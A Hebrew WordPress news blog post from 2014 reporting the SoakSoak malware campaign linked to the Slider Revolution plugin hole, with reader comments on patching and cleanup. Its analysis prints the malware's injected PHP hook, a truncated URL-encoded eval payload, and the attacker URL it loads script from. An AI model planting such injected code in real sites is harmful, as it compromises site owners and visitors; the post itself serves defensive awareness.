דף הבית » חדשות ועדכונים

מעל 100,000 אתרי וורדפרס נפגעו מנוזקת SoakSoak

15 בדצמבר 2014 | מאת רמי | 9 תגובות | תגיות: ,

בתחילת השבוע גוגל הוסיפה לרשימה השחורה שלה מעל 11,000 דומיינים שנפגעו מנוזקת SoakSoak.ru, כאשר גלישה לאתרים אלה מדפדפן גוגל כרום מתריעה למשתמש כי מדובר באתר בסיכון.

נוזקת SoakSoak.ru

נוזקת SoakSoak.ru

חוקרים מטעם חברת sucuri מעריכים כי הנוזקה פגעה בכ-100 אלף אתרי וורדפרס. לדבריהם, ניתוח ראשוני מראה כי קיימת קורולציה גבוהה בין וקטור תקיפה זה לחור האבטחה בתוסף הפופולרי Slider Revolution Plugin שהתגלה בחודש ספטמבר.

נזכיר שהתוסף Slider Revolution כה פופולרי עד שחברת Envato, המפעילה את ThemeForest, החליטה על השהיית עשרות תבניות וורדפרס שמשתמשות בתוסף עד שהן יעדכנו לגרסה האחרונה ביותר של התוסף. הדבר גרם לפגיעה תדמיתית וכלכלית הן לחברת Envato והן למפתחי תבניות שעשו שימוש בתוסף. וזה מבלי לציין את הפגיעה בעשרות אלפי האתרים שעושים שימוש בתבניות אלה.

ניתוח נוזקת SoakSoak

הנוזקה משנה את הקובץ wp-includes/template-loader.php ומוסיפה לו את הקוד הבא:

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

הקוד טוען את הקובץ wp-includes/js/swobject.js בכל עמוד בו מבקר הגולש, ומריצה:

eval(decodeURIComponent
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

כאשר הנוזקה מפוענחת, היא טוענת קוד javascript זדוני מהאתר SoakSoack.ru בקובץ: http://soaksoak.ru/xteas/code

מי נפגע ומה עושים?

מתוך כ-70 מיליון אתרי וורדפרס בעולם, מעריכים כי מעל 100 אלף אתרים נדבקו בנוזקת SoakSoak.ru, רובם נפגעו בגלל שימוש בגרסאות וורדפרס ישנות ותוספים לא מעודכנים. עד כה גוגל סימנה ברשימה השחורה שלה כ-11 אלף דומיינים.

חברת Sucuri מאפשרת לבצע בדיקה בחינם כדי לגלות האם גם האתר שלכם נפגע מהנוזקה. אם נפגעתם, יש לשדרג את המערכת וכל התוספים לגרסאות האחרונות ביותר!

מאת רמי

אחראי על אתר וורדפרס בעברית ועל תרגום ושחרור גרסאות וורדפרס בעברית. מפתח ליבה, בכל גרסה החל מגרסה 2.8, מפתח מוביל בגרסה 4.4 ובגרסה 4.6. מספק שירותי פיתוח אתרים, פיתוח תוספי וורדפרס לסטרטאפים ופיתוח כלים למפתחי וורדפרס - GenerateWP.com.

9 תגובות »

  • דוד כותב :

    רמי,
    את/דומיין של לקוחה שלי ניזוק
    חשבתי שזה רק הוא.
    עכשיו אני רואה שאני לא לבד במערכה..
    תודה על העדכון

  • רמי כותב :

    דוד, אתה לא לבד במערכה. ואני מניח שזו לא תהיה הפעם האחרונה.

    אני גם ממליץ לך (ולרבים אחרים) לשלוח ללקוחות לינקים לידיעות כאלה, בשביל לעורר גם אצלם מודעות לנושאי אבטחה.

  • חתול כותב :

    נראה ש־sucuri רק עסוקים בהפחדה כדי שישלמו להם.
    כל אתר שבדקתי סומן כקריטי ואדום.

  • דוד כותב :

    עוד התקפה והזרקת קוד זדוני לאתרים ביממה האחרונה..
    http://blog.sucuri.net/2014/12/soaksoak-new-wave-evolution-attacks.html

  • יהודה מ: וורדפרס קלאב כותב :

    שימו לב! יש להתקין את הפלאגין הבא
    https://wordpress.org/plugins/patch-for-revolution-slider/

  • לותן כותב :

    ואםן אני פשוט מעדכן את הגירסה של סליידר רוולושיין זה לא מספיק? חייב גם את הפלאגין שצירפת?

  • יהודה מ: וורדפרס קלאב כותב :

    אם הגרסה של התבנית היא הגרסה אחרונה וגם של וורדפרס אין בעיה לעדכן את הפלאגין
    אבל אחרת צריך את הפאטצ'

    כול טוב!
    יהודה
    http://www.wpclub.co.il/

  • יוסי חכמון כותב :

    אצלי בשרת נפגעו מלא אתרים, אחרי עדכון ובדיקה של sucuri עבר הבלאגן אבל נשארו מלא קבצי זבל שנוצרו עקב זה. יש דרך לזהות איזה קבצים הם קבצי זבל ולהעיף אותם?

  • דוד כותב :

    גם מצאתי קבצי php ותיקיות רבות של ספאם. אני פשוט מחקתי את כל מה שלא קשור ולא אמור להיות ב-public html

הוסף תגובה !

נא לא לשאול שאלות שלא קשורות לפוסט, זהו לא פורום תמיכה. לבעיות אישיות ונושאים מורכבים אפשר ליצור איתי קשר.

תגיות HTML מורשות לשימוש:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>